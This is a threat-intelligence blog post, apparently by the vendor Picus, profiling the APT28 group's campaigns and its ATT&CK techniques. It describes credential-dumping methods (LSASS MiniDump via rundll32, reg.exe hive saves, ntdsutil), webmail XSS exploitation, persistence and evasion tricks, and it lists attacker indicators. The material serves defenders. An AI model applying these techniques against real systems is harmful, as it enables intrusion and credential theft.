APT28 Cyber Threat Profile and Detailed TTPs

APT28 has established itself as one of the most persistent and adaptable threat groups active today, operating across political, military, and diplomatic landscapes for more than a decade. First observed in 2009, the group quickly moved from small-scale intrusions to high-impact operations. Its major events include compromises of government, NGO, and media organizations; the 2015 disruption of TV5Monde; the 2016 breaches of the DCCC (Democratic Congressional Campaign Committee) and DNC (Democratic National Committee); the targeting of WADA (World Anti Doping Agency) and release of athlete data; activity linked to the Lausanne hotel intrusion affecting CCES (Canadian Centre for Ethics in Sport); the failed 2018 close access attempt against the OPCW (Organisation for the Prohibition of Chemical Weapons); the introduction of the Nearest Neighbor Wi Fi technique in 2022; large scale website compromises across Ukrainian government entities in 2023; and the 2025 appearance of LAMEHUG malware capable of generating commands from text.

Across these operations, APT28 consistently adapts its methods, blending proven tradecraft with new capabilities to match each target environment. The group’s TTPs span the full intrusion lifecycle, involving targeted reconnaissance of Wi-Fi networks, social engineering over secure messaging platforms, and predictive domain registration to build infrastructure in advance. Access vectors combine spearphishing documents, exploitation of webmail vulnerabilities, and proximity-based Wi-Fi attacks. Execution frequently relies on PowerShell, native Windows utilities, and malicious Office macros, while persistence is maintained through logon script manipulation and COM hijacking. Privilege escalation uses vulnerabilities such as CVE-2022-38028, and defense evasion techniques range from steganography and encryption to MOTW bypasses. The group collects data through keylogging, email harvesting, clipboard monitoring, and automated mailbox extraction, and communicates over HTTPS or cloud storage services before exfiltrating stolen information through encrypted uploads.

In this post, we will review APT28’s major historical operations, highlight its significant campaigns across political, governmental, and international organizations, and analyze its tactics, techniques, and procedures to understand how it conducts sustained and multifaceted cyber operations. In the end, we will show how Picus helps defend against this group.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

What Are the Major Activities of the APT28 Group?

2009 – Activity attributed to the group began, with targets including military and government entities, non-governmental organizations (NGOs), and journalists [1].

8 April 2015 – The broadcast network of French TV station TV5Monde was compromised and taken off air in a sabotage operation claimed by the "CyberCaliphate," which was assessed to be a false flag operation conducted by the group [1].

March 2016 – A spearphishing campaign was launched targeting personal email accounts of individuals associated with the Hillary Clinton presidential campaign, including the campaign chairman, using shortened links redirecting to spoofed Google login pages.

April 2016 – Networks belonging to the Democratic Congressional Campaign Committee (DCCC) and the Democratic National Committee (DNC) were breached, leading to the exfiltration of thousands of emails and documents [2].

15 June 2016 – The "Guccifer 2.0" online persona was created to claim responsibility for the DNC breach and disseminate stolen documents, falsely presenting the intrusion as the work of a lone hacktivist.

August 2016 – The World Anti-Doping Agency (WADA) was targeted; stolen medical records of athletes were subsequently leaked under the guise of the "Fancy Bears' Hack Team" [1].

September 2016 – An on-site compromise of a Wi-Fi network at a hotel in Lausanne, Switzerland, was used to target a senior official from the Canadian Centre for Ethics in Sport (CCES) and subsequently compromise the CCES network [3].

February 2018 – Ministries of Foreign Affairs in Europe and North America were targeted using a "Jane's 360" defense event lure to deliver the SofacyCarberp payload via malicious Excel macros [4].

April 2018 – An attempted close-access hacking operation targeting the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague was disrupted, leading to the seizure of equipment used to compromise Wi-Fi networks [3].

September 2019 – A broad credential harvesting campaign was initiated against more than 200 organizations, including political campaigns and policy organizations, utilizing brute force and password spray tactics routed through the Tor network [5].

February 2022 – A "Nearest Neighbor" attack vector was employed, where compromised Wi-Fi networks at adjacent organizations were used to gain proximity access to a target’s corporate Wi-Fi network, facilitated by a zero-day privilege escalation vulnerability (CVE-2022-38028) in the Windows Print Spooler service [6].

February 2023 – Reflected cross-site scripting (XSS) vulnerabilities on Ukrainian government websites were exploited to redirect users to phishing pages designed to steal webmail credentials [7].

10 July 2025 – The LAMEHUG malware, which integrates Large Language Model (LLM) capabilities to generate commands based on text descriptions, was deployed against Ukrainian government officials [8].

Which MITRE ATT&CK Techniques Are Used by APT28?

The following is a comprehensive analysis of the Tactics, Techniques, and Procedures (TTPs) attributed to APT28. This analysis aggregates intelligence observed across multiple campaigns, including the "Nearest Neighbor" attack, campaigns targeting Ukrainian military personnel via Signal, and Operation RoundPress [4][6][9][10].

Tactic: Reconnaissance

T1595.002 Active Scanning: Vulnerability Scanning

To discover potential entry vectors into a target network, the adversary deployed a custom PowerShell script on compromised systems belonging to neighboring organizations. This script was utilized to enumerate and examine wireless networks within the range of a dual-homed system's wireless adapter. Through this activity, the Service Set Identifier (SSID) of the intended target's enterprise Wi-Fi network was identified.

T1598 Phishing for Information 

In specific campaigns, Ukrainian military administration and command personnel were targeted to identify wounded personnel, associated chains of command, units, and equipment provisioning trails. To facilitate this, the threat actor engaged targets via private chats on the Signal messaging application. By posing as a superior or colleague, the adversary created a false sense of urgency, invoking legal threats or compensation decisions, to pressure victims into performing actions or providing sensitive information.

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains 

The adversary registered new domains and populated them with default landing pages, which were reused over the course of a year. These pages contained specific strings, such as "866-593-54352", "522 Clematis. Suite 3000", and "403-965-2341", which allowed for the prediction of C2 domains like cdnverify[.]net prior to their active use. Additionally, specific domains were acquired to support "Operation RoundPress," including:

T1583.004 Acquire Infrastructure: Server

Virtual Private Servers (VPS) were utilized to host command and control infrastructure. These servers were hosted by various providers, including GLOBALAXS NOC PARIS, 23VNet Kft, Administrat, Belcloud, M247 Europe SRL, and HOSTGNON LTD.

T1583.006 Acquire Infrastructure: Web Services

Legitimate cloud storage services were leveraged to facilitate command and control (C2) operations. Accounts were registered on platforms such as Icedrive and Koofr, including specific accounts like Alan_Smith2304@outlook[.]com and jakub2233@tutamail[.]com. These accounts hosted distinct storage containers for storing malware payloads and depositing exfiltrated data.

T1587.001 Develop Capabilities: Malware

Open-source frameworks were modified to suit operational requirements. The Covenant framework, specifically the GruntHTTPStager, was utilized with a custom C2Bridge to allow interaction with the Koofr API. 

Additionally, a custom C++ malware named BeardShell was developed to execute PowerShell commands and interact with Icedrive. 

For webmail operations, a specialized JavaScript framework named "SpyPress" was created with four variants: SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA.

T1588.002 Obtain Capabilities: Tool

The open-source tool Luckystrike was assessed to have been used for generating malicious delivery documents. Macros found in delivery documents bore a close resemblance to those generated by Luckystrike.

Tactic: Initial Access

T1190 Exploit Public-Facing Application

Access to victim environments was obtained via spearphishing emails that exploited Cross-Site Scripting (XSS) vulnerabilities in public-facing webmail servers. Malicious code was embedded in email headers or directly in the HTML body, triggering execution when the message was viewed.

• Roundcube (CVE-2023-43770): Exploited a regex failure in rcube_string_replacer.php to inject script tags.
• MDaemon (CVE-2024-11182): Leveraged a zero-day vulnerability where the HTML parser incorrectly rendered an img tag following a noembed end tag inside a p element's title attribute.
• Zimbra (CVE-2024-27443): Exploited a failure to sanitize the cif attribute populated from the X-Zimbra-Calendar-Intended-For header.
• Horde: Attempted to exploit a legacy XSS flaw using the onerror attribute of an img element.

T1566.001 Phishing: Spearphishing Attachment

Phishing emails were sent with subject lines such as "Upcoming Defense events February 2018". The sender address was spoofed to resemble events@ihsmarkit.com, and the email contained a malicious Excel XLS attachment named "Upcoming Events February 2018.xls".

T1566.003 Phishing: Spearphishing via Service

Weaponized Office documents were delivered directly via private Signal chats on the desktop version of the application. These documents mimicked official Ukrainian military forms, such as medical compensation requests, and personnel reports. This method was strategic because Signal Desktop does not implement Mark-of-the-Web (MOTW), preventing the documents from triggering standard Microsoft Office security flags.

T1669 Wi-Fi Networks

The proximity of neighboring organizations was leveraged to connect to a target's corporate Wi-Fi network. By compromising a dual-homed system (connected via both Wi-Fi and wired Ethernet) at a nearby location, the adversary bridged the physical gap and established a connection to the target's wireless network without being on-site. This "Nearest Neighbor" attack later involved re-establishing access via the target's Guest Wi-Fi, which was not fully isolated from the wired corporate network.

Tactic: Execution

T1059.001 Command and Scripting Interpreter: PowerShell

PowerShell was used extensively to facilitate the "Nearest Neighbor" attack, compress files, and execute commands.

• Archiving: Commands were executed to compress exported registry hives and large files from volume shadow copies into ZIP archives.

• BeardShell Execution: The BeardShell backdoor, despite being written in C++, loaded the CLR and System.Management.Automation assembly to create PowerShell instances. It utilized JSON sequences to manage sessions, such as:

T1059.003 Command and Scripting Interpreter: Windows Command Shell

The Windows Command Shell was employed to run native utilities (reg.exe, netsh.exe, cipher.exe) and batch scripts.

• Registry Saves: A batch file named servtask.bat was executed to invoke registry saves.

• Payload Execution: A command was used to execute a malicious DLL via rundll32.exe.

T1059.005 Command and Scripting Interpreter: Visual Basic

Weaponized Excel and Word documents contained malicious VBA macros responsible for dropping payloads, establishing persistence, and revealing hidden content.

• API Declaration: Macros declared Windows API functions based on the host's VBA version.

• Content Reveal: Content hidden by white font was revealed using VBA.

T1106 Native API

Malware extensively utilized Windows API functions. VBA macros used CreateProcessW for execution and GetFileAttributesW (aliased as GetImageResolution) to check for file existence.

The BeardShell backdoor leveraged LoadLibrary, GetProcAddress, and GetModuleFileNameW to facilitate execution and DLL proxying.

T1203 Exploitation for Client Execution

In the "Operation RoundPress" campaign, injected JavaScript executed within the victim's browser session upon rendering the malicious email.

• Horde Payload: Used an img tag with an undefined source to trigger an onerror event that evaluated a Base64 payload.

• MDaemon Payload: Leveraged a parser bug to force the rendering of a malicious image tag.

• Roundcube Payload: Bypassed sanitization to inject script tags directly.

• Zimbra Payload: Targeted a hidden div element (a-cashed-skinLayout2) containing the payload, triggered via the X-Zimbra-Calendar-Intended-For header .

T1204.002 User Execution: Malicious File

Infection relied on victims opening weaponized documents received via Signal or phishing emails. The lack of MOTW on Signal files permitted macros to run without standard security blocks, while Excel documents used white-on-white text to trick users into enabling macros to view content.

Tactic: Persistence

T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)

Persistence was established by writing the path of a malicious batch file to the HKCU\Environment\UserInitMprLogonScript registry key, ensuring the payload executed upon user login.

T1546.015 Event Triggered Execution: Component Object Model Hijacking

A malicious macro registered a new COM server to establish persistence. Using reg.exe, a registry key was added to point to a malicious DLL, ensuring it loaded with explorer.exe at login.

Tactic: Privilege Escalation

T1068 Exploitation for Privilege Escalation

The post-compromise tool GooseEgg was utilized to exploit CVE-2022-38028, a vulnerability in the Microsoft Windows Print Spooler service. This activity facilitated privilege escalation on the compromised system.

Tactic: Defense Evasion

T1027 Obfuscated Files or Information

Multiple obfuscation techniques were employed to conceal operations:

• Steganography: Shellcode was concealed within valid PNG files (e.g., windows.png, koala.png) using the Least Significant Bit (LSB) of each pixel's 4 bytes . The extracted payload included the key, IV, and AES-CBC encrypted content .
• String Encryption: Strings in compiled binaries were encrypted using a single-byte XOR cipher.
• Visual Obfuscation: Macros applied white font color to hide text within documents.
• Certificate Masquerading: Payloads were Base64 encoded and enclosed between -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- strings.
• JavaScript Obfuscation: SpyPress payloads randomized variable and function names and kept critical strings (like C2 URLs) in an encrypted list .

T1036.005 Masquerading: Match Legitimate Name or Location

The malicious DLL prnfldr.dll was placed in C:\ProgramData\, mimicking a legitimate library associated with printer folders. The malware proxied exports of the legitimate DLL to maintain standard printing operations and avoid suspicion.

T1036.008 Masquerading: Masquerade File Type

Additionally, archive files created for exfiltration were renamed with innocuous extensions such as .mp4 and .wav to resemble benign media files.

T1055 Process Injection

Malware attempted to inject code into running browser processes to handle C2 communications. It searched for processes like firefox.exe, chrome.exe, and iexplore.exe by comparing hashed process names against hardcoded values.

T1070.004 Indicator Removal: File Deletion

Files and folders created during operations were removed to conceal traces of the intrusion. The native Windows utility Cipher.exe was used to securely overwrite the deleted data, hindering forensic recovery.

T1140 Deobfuscate/Decode Files or Information

VBA macros included routines to deobfuscate data at runtime by replacing character pairs to reconstruct valid commands.

Additionally, the certutil -decode command was used to transform Base64 encoded text files into executables.

T1497.001 Virtualization/Sandbox Evasion: System Checks

BeardShell performed anti-analysis checks immediately upon thread creation, terminating execution if the host had less than 2 GB of RAM or only one processor.

T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass

By delivering malicious documents via Signal Desktop, the Mark-of-the-Web (MOTW) protection was bypassed. Signal does not apply the MOTW identifier to saved files, preventing Microsoft Office from triggering "Protected View" and allowing macros to run.

T1564.001 Hide Artifacts: Hidden Files and Directories

Malicious macros utilized the GetFileAttributesW function to set file attributes for dropped payloads (e.g., windows.png, prnfldr.dll) to hidden, reducing their visual footprint.

T1574 Hijack Execution Flow

DLL proxying was utilized by the malicious prnfldr.dll, which acted as a proxy for the legitimate DLL. Upon loading, it retrieved addresses of genuine functions from the real library and forwarded calls to them. 

A similar technique was observed with the SlimAgent tool proxying eapphost.dll.

Tactic: Credential Access

T1003.001 OS Credential Dumping: LSASS Memory

The rundll32.exe utility was used to execute the MiniDump function exported by comsvcs.dll to dump the memory of the LSASS process.

T1003.002 OS Credential Dumping: Security Account Manager

Credentials were harvested by exporting sensitive registry hives. The reg.exe utility was used to save the System, Security, and SAM hives to C:\ProgramData for exfiltration.

T1003.003 OS Credential Dumping: NTDS

The Active Directory database (ntds.dit) was targeted for credential access.

• Vssadmin: Used to create shadow copies and copy the system hive and database.

• Ntdsutil: Leveraged to export the Active Directory database.

T1056.003 Input Capture: Web Portal Capture

SpyPress variants injected hidden HTML input fields into webmail pages to capture password manager autofills or user keystrokes.

• Horde: Created inputs named horde_user and horde_pass with 0% opacity.
• MDaemon: Used User and Password inputs.
• Zimbra: Used username and password inputs.
• Roundcube: Used _user and _pass inputs. Data was exfiltrated immediately upon entry via a change event listener.

T1110.003 Brute Force: Password Spraying

Password-spray attacks were conducted against Internet-facing web services to identify valid accounts prior to breaching the network.

Additionally, a Kubernetes cluster was operated to conduct distributed, large-scale password spraying and guessing, often routed through commercial VPN services and TOR.

T1187 Forced Authentication

To facilitate credential harvesting, SpyPress.ROUNDCUBE forced victims to log out by creating an iframe that triggered a logout task. This compelled users to re-enter credentials into the compromised login flow.

Tactic: Discovery

T1012 Query Registry

Malicious macros verified the installation of specific .NET Framework versions by checking for the existence of the directory C:\Windows\Microsoft.NET\Framework\v4.0.30319 to ensure support for subsequent payloads.

T1016 System Network Configuration Discovery

Reconnaissance tasks were executed on infected hosts through the Covenant framework. These tasks included using tracert to map network routes, performing ARP scans, and issuing GetNetworkInfo requests.

T1033 System Owner/User Discovery

BeardShell retrieved the current username and workstation name using the Windows API NetWkstaUserGetInfo with parameter 1. This data was used to generate a unique identifier for the infected host.

T1057 Process Discovery

The Covenant implant enumerated running processes to identify targets of interest or security software. 

Additionally, malware hashed process names derived from SystemProcessInformation to identify web browsers for injection.

T1082 System Information Discovery

BeardShell executed the SystemInfo command as its first action. It also combined the local computer name, domain name, username, workstation name, and a hardware profile GUID (via GetCurrentHwProfileW) to create a unique fingerprint hash using the FNV4 algorithm. 

Other campaigns collected unique identifiers based on storage volume serial numbers.

T1083 File and Directory Discovery

To avoid re-infection or detection, VBA macros queried for the existence of specific files, such as %localappdata%/windows.png and %allusersprofile%/prnfldr.dll, terminating if they were found.

T1087.003 Account Discovery: Email Account

SpyPress malware enumerated details about compromised email accounts.

• Roundcube: Fetched the "about" page (_action=about) and the mailbox list via rcmail.env.mailboxes.
• Zimbra: Exfiltrated the ZmSetting global variable containing preferences and configuration.

Tactic: Collection

T1056.001 Input Capture: Keylogging

The SlimAgent tool acted as a keylogger, recording keystrokes and encoding special keys in unicode (e.g., [BKSP]). It specifically monitored for potential passwords by triggering screenshots when a buffer of more than 4 characters was followed by an "Enter" press.

T1074.002 Data Staged: Remote Data Staging

Archives of collected data were staged on the target's Outlook Web Access (OWA) server.

T1113 Screen Capture

Screen capture functionality was implemented by simulating the VK_SCREENSHOT key press, saving the screenshot to the clipboard.

Covenant uploaded PNG screenshots of the desktop, while SlimAgent captured JPEG screenshots every 5 seconds.

T1114.002 Email Collection: Remote Email Collection

SpyPress malware systematically iterated through victim mailboxes to collect messages.

• MDaemon: Browsed folders and retrieved full email sources via specific URL requests (/WorldClient.dll?Session=...).
• Roundcube: Fetched email sources using _action=viewsource and uid, filtering for messages received after a hardcoded date.
• Zimbra: Iterated over the first 80 emails in each folder via SOAP requests.

T1114.003 Email Collection: Email Forwarding Rule

To maintain access to information, SpyPress.ROUNDCUBE created a malicious server-side Sieve rule. This rule forwarded a copy of every incoming email to an attacker-controlled address (e.g., srezoska@skiff[.]com), ensuring collection persisted even if the malicious script stopped running.

T1115 Clipboard Data

After triggering a screenshot key press, malware accessed the clipboard to retrieve the image data and convert it to JPG. 

SlimAgent also monitored the clipboard, logging content between black-colored HTML tags to distinguish it from other data.

T1119 Automated Collection

SpyPress payloads implemented automated data harvesting routines. SpyPress.ROUNDCUBE initiated email exfiltration every 7,200 seconds (2 hours), while SpyPress.ZIMBRA used setInterval to trigger every 14,400 seconds (4 hours).

T1560.001 Archive Collected Data: Archive via Utility

Data collected from compromised systems, including ntds.dit and registry hives, was compressed into ZIP archives using PowerShell commands or the GUI version of WinRAR. WinRAR were also used to password-protect these archives.

Tactic: Command and Control

T1071.001 Application Layer Protocol: Web Protocols

Communication with C2 servers was conducted over HTTPS, with malware configured to ignore invalid security certificates using flags such as SECURITY_FLAG_IGNORE_CERT_DATE_INVALID and SECURITY_FLAG_IGNORE_UNKNOWN_CA.

T1090.001 Proxy: Internal Proxy

To pivot from a Guest Wi-Fi network back into the corporate wired network, a series of port-forwards were established using netsh. This allowed access to segmented high-value systems.

T1102.002 Web Service: Bidirectional Communication

Koofr and Icedrive were utilized as dead-drop resolvers.

• Koofr (Covenant): Malware polled the Transfering folder for tasks and uploaded results to the Keeping folder.
• Icedrive (BeardShell): Malware created a directory named after the host's FNV4 hash and polled it every four hours for command files.

T1132.001 Data Encoding: Standard Encoding

SpyPress payloads encoded data sent to the C2 server in Base64. A specific string format was used for credentials, where px denoted password exfiltration.

T1573.001 Encrypted Channel: Symmetric Cryptography

Files transferred to and from C2 storage were encrypted. BeardShell utilized the ChaCha20-Poly1305 algorithm with a 32-byte key, producing a 16-byte authentication tag. Headers and footers were added to masquerade the encrypted data as valid image types (GIF, PNG, JPEG).

Tactic: Exfiltration

T1041 Exfiltration Over C2 Channel

Collected system information, screenshots, email bodies, contacts, and credentials were transmitted directly to the C2 server via established HTTPS channels or HTTP POST requests.

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Collected data, including keylogs, screenshots, and command outputs, was exfiltrated by uploading files to designated containers on cloud storage services like Icedrive or Koofr. SlimAgent prepared encrypted logs in HTML format, named Desktop_<DD-MM-YYYY_HH-MM-SS>.svc, for this purpose.

How Picus Simulates APT28 Attacks?

We also strongly suggest simulating APT28 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for APT28:

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the APT28 Group?

APT28 is also known as: APT 28, APT-C-20, ATK5, Blue Athena, BlueDelta, FANCY BEAR, FROZENLAKE, Fancy Bear, Fighting Ursa, Forest Blizzard, G0007, Grey-Cloud, Grizzly Steppe, Group 74, Group-4127, GruesomeLarch, IRON TWILIGHT, ITG05, Pawn Storm, SIG40, SNAKEMACKEREL, STRONTIUM, Sednit, Sofacy, Swallowtail, T-APT-12, TA422, TG-4127, Tsar Team, TsarTeam, UAC-0028, Threat Group-4127, ATK 5, TAG-0700, UAC-0063, TAG-110.

Key Takeaways

• APT28 has maintained a persistent operational tempo since 2009, targeting political, military, and diplomatic entities globally through high-profile campaigns such as the 2016 DNC breaches and the 2025 deployment of LAMEHUG malware.
• The group demonstrates significant adaptability by combining proven tradecraft with novel techniques, including the "Nearest Neighbor" attack vector that compromises corporate Wi-Fi networks via adjacent buildings and the integration of Large Language Model capabilities for command generation.
• Initial access strategies frequently exploit vulnerabilities in public-facing webmail servers like Roundcube, MDaemon, and Zimbra, alongside spearphishing campaigns that utilize the Signal messaging platform to bypass Mark-of-the-Web security controls.
• APT28 leverages legitimate cloud storage services such as Icedrive and Koofr for Command and Control (C2) operations, utilizing them as dead-drop resolvers to host malware payloads and store exfiltrated data.
• The group employs extensive defense evasion tactics, including the use of steganography to conceal shellcode within valid PNG files, DLL proxying to masquerade as legitimate system libraries, and the native Cipher.exe utility to securely wipe forensic artifacts.
• Credential access and collection focus on extracting data from the Active Directory database (ntds.dit), dumping LSASS memory, and deploying specialized JavaScript frameworks like SpyPress to capture browser inputs and harvest emails.
• Persistence and privilege escalation are achieved through sophisticated mechanisms such as COM hijacking, modification of logon scripts, and the use of the GooseEgg tool to exploit the CVE-2022-38028 vulnerability in the Windows Print Spooler service.

References

[1] “IRON TWILIGHT Supports Active Measures,” Secureworks. Accessed: Dec. 05, 2025. [Online]. Available: https://www.secureworks.com/research/iron-twilight-supports-active-measures

[2] “CrowdStrike’s work with the Democratic National Committee: Setting the record straight,” CrowdStrike.com. Accessed: Dec. 05, 2025. [Online]. Available: https://www.crowdstrike.com/en-us/blog/bears-midst-intrusion-democratic-national-committee/

[3] “U.S. Charges Russian GRU Officers with International Hacking and Related Influence and Disinformation Operations.” Accessed: Dec. 05, 2025. [Online]. Available: https://www.justice.gov/archives/opa/pr/us-charges-russian-gru-officers-international-hacking-and-related-influence-and

[4] B. Lee, M. Harbison, and R. Falcone, “Sofacy Attacks Multiple Government Entities,” Unit 42. Accessed: Dec. 04, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/

[5] T. Burt, “New cyberattacks targeting U.S. elections,” Microsoft On the Issues. Accessed: Dec. 05, 2025. [Online]. Available: https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/

[6] “The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access,” Volexity. Accessed: Dec. 04, 2025. [Online]. Available: https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/

[7] B. Leonard, “Ukraine remains Russia’s biggest cyber focus in 2023,” Google. Accessed: Dec. 05, 2025. [Online]. Available: https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/

[8] V. Simonovich, “Cato CTRL^TM Threat Research: Analyzing LAMEHUG – First Known LLM-Powered Malware with Links to APT28 (Fancy Bear),” Cato Networks. Accessed: Dec. 05, 2025. [Online]. Available: https://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/

[9] G. Amaury, M. Charles, T. D. R. Sekoia, and C. M. A. S. T. Amaury G., “APT28 Operation Phantom Net Voxel,” Sekoia.io Blog. Accessed: Dec. 04, 2025. [Online]. Available: https://blog.sekoia.io/apt28-operation-phantom-net-voxel

[10] M. Faou, “Operation RoundPress.” Accessed: Dec. 05, 2025. [Online]. Available: https://www.welivesecurity.com/en/eset-research/operation-roundpress/